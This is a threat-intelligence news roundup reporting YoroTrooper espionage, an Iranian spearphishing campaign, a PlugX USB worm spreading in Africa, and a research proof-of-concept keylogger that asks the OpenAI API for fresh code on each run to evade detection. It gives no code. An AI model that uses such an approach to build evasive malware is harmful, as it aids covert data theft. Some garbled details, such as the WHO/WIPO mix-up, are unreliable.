Take a look
- YoroTrooper targets the CIS countries.
- Charming Kitten spearphishing campaign.
- PlugX campaign expands to Africa.
- AI used to generate polymorphic keylogger.
YoroTrooper targets the CIS countries.
Cisco Talos is tracking a new threat actor the company calls “YoroTrooper,” which has been conducting cyberespionage campaigns against Europe and the CIS countries since at least June 2022. The threat actor primarily targets “organizations governments or energy in Azerbaijan, Tajikistan, Kyrgyzstan and others”. Commonwealth of Independent States (CIS)”. The threat actor has successfully compromised the embassies of Azerbaijan and Turkmenistan, as well as accounts belonging to a “critical health care agency of the European Union (EU) and the World Health Organization (WIPO)”. YoroTrooper uses phishing emails with malicious attachments to distribute a variety of basic Trojans.
Investigators believe the threat actor speaks Russian, but do not attribute the group to any particular nation-state.
Charming Kitten spearphishing campaign.
Secureworks describes a phishing campaign targeting researchers documenting the oppression of women in Iran. Investigators believe the campaign is run by the Iranian government APT COBALT ILLUSION (also known as Charming Kitten, APT42 or Phosphorous), a threat actor who frequently targets “academics, journalists, human rights defenders, political activists , Intergovernmental Organizations (IGOs), and Non-Governmental Organizations (NGOs) that focus on Iran.” In this case, the author of the threat is posing as a researcher working with the Atlantic Council think tank, using a fake Twitter account to send messages to various people working on Middle East political affairs research.
PlugX campaign expands to Africa.
Sophos is tracking a new version of the USB PlugX Trojan. The researchers say that the “novel aspects of this variant are a new payload and callbacks to a C2 server previously thought to have only a tenuous relationship to this worm.” PlugX is a known malware variant that can spread via USB sticks, which can sometimes allow it to access air-gapped systems. The malware is currently spreading in African countries, with infections observed in Ghana, Zimbabwe and Nigeria. The new variant was also observed in Papua New Guinea and Mongolia. Sophos believes this campaign is linked to the Chinese Mustang Panda APT, which is known to have used the malware in the past.
Gabor Szappanos, Director of Threat Research at Sophos, stated:
“In November 2022, we reported on a different group of active adversarial activity targeting government organizations in Southeast Asia that was also taking advantage of this ‘throwback’ method of propagation via USB drives. This worm appeared thousands of kilometers away in Africa a month later. Now this latest cluster of USB worm activity is hopping across three different continents. We don’t typically think of removable media as particularly “mobile,” especially when compared to Internet-based attacks, but this dispersal method has proven highly effective in this part of the world.
AI used to generate polymorphic keylogger.
HYAS researchers have developed a proof-of-concept strain of polymorphic malware that uses the OpenAI API to evade detection. The malware, which the researchers call “BlackMamba”, is a keylogger that is delivered as an apparently benign executable. However, once executed, BlackMamba will communicate with OpenAI and request that the AI generate keylogging code: “It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the part malicious polymorphic remaining entirely in -memory. Every time BlackMamba runs, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry-leading EDR that will remain unnamed, many times, resulting in zero alerts or detections.” Researchers can then filter the captured data through legitimate communication and collaboration tools (in this case, Microsoft Teams).